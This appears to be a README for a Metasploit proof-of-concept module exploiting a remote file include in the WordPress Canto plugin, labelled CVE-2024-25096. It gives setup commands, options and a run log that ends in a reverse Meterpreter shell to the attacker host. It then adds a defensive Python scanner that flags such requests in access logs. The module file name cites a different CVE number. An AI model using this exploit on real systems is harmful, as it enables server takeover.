# Metasploit exploit module: Canto RCE CVE-2024-25096

This is a PoC exploit of the Canto RCE CVE-2024-25096 for Metasploit.

## Usage

Download the exploit and add it to the Metasploit module folder.
Reload Metasploit and select the payload.

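```bash
# Fetch the repository into ./exploit (the repository URL is not given on this page)
git clone <repository-url> exploit
cp exploit/rce_exploit_cve_2023_3452.rb ~/.msf4/modules/exploits/
msfconsole
# The remaining commands are typed at the msfconsole prompt
reload_all
search rce_exploit_cve_2023_3452
use 0
```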
Set the values of the required options:

```bash
Module options (exploit/rce_exploit_cve_2023_3452):

   Name        Current Setting            Required  Description
   ----        ---------------            --------  -----------
   Proxies                                no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, http, socks5h
   RHOSTS      192.168.0.3                yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT       8080                       yes       Port
   SRVHOST     0.0.0.0                    yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT     9998                       yes       The local port to listen on.
   SSL         false                      yes       Use SSL
   SSLCert                                no        Path to a custom SSL certificate (default is randomly generated)
   TARGETFILE  get.php                    yes       Vulnerable PHP file
   TARGETURI   /wp-content/plugins/canto  yes       Path to cantos root directory
   URIPATH                                no        The URI to use for this exploit (default is random)
   VHOST                                  no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.0.2      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wordpress cantp plugin

> run
[*] Started reverse TCP handler on 192.168.0.2:4444 
[*] Starting HTTP server...
[*] Using URL: http://192.168.0.2:9998/Rj5Nh2b
[*] Triggering RFI...
[*] 192.168.0.3   my_expi - Sending admin.php payload
[*] Sending stage (42137 bytes) to 192.168.0.3
[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.3:42234) at 2026-02-28 23:40:27 +0100
```
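
The run above shows the module serving a file over HTTP and then "Triggering RFI" against a PHP file under the plugin directory. As an added example (not part of the original repository), this Python check flags that request pattern in web server access logs. It assumes common/combined log format and that the remote location travels as a URL in a query-string value; `suspicious_params`, `scan` and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Plugin path from the TARGETURI value shown in the module options above.
PLUGIN_PREFIX = "/wp-content/plugins/canto/"
# Assumption: the included file is given as a URL in a query-string value.
REMOTE_VALUE = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)
# Assumption: access logs use the common/combined log format.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def suspicious_params(target):
    """Return (name, value) pairs that hand a Canto plugin PHP file a remote URL."""
    parts = urlsplit(target)
    path = unquote(parts.path).lower()
    if not (path.startswith(PLUGIN_PREFIX) and path.endswith(".php")):
        return []
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double-encoded values.
        decoded = unquote(value)
        if REMOTE_VALUE.match(value) or REMOTE_VALUE.match(decoded):
            hits.append((name, decoded))
    return hits

def scan(lines):
    """Return (client_ip, status, hits) for every log line that is flagged."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m:
            hits = suspicious_params(m.group("target"))
            if hits:
                findings.append((m.group("ip"), int(m.group("status")), hits))
    return findings

# Constructed log lines (not captured traffic); the parameter names are made up.
SAMPLE = [
    '192.168.0.2 - - [28/Feb/2026:23:40:26 +0100] "GET /wp-content/plugins/canto/get.php?p=http%3A%2F%2F192.168.0.2%3A9998%2FRj5Nh2b HTTP/1.1" 200 512',
    '192.168.0.9 - - [28/Feb/2026:23:41:02 +0100] "GET /wp-content/plugins/canto/get.php?album=summer&limit=20 HTTP/1.1" 200 1024',
    '192.168.0.9 - - [28/Feb/2026:23:41:30 +0100] "GET /wp-content/plugins/other/go.php?to=https://example.com/ HTTP/1.1" 302 0',
    '198.51.100.7 - - [28/Feb/2026:23:42:11 +0100] "GET /wp-content/plugins/canto/get.php?p=http%253A%252F%252F198.51.100.7%252Fx HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for ip, status, hits in scan(SAMPLE):
        print(ip, status, hits)
```

A hit shows that the request was made, not that the include succeeded; pair it with outbound-connection logs from the web server.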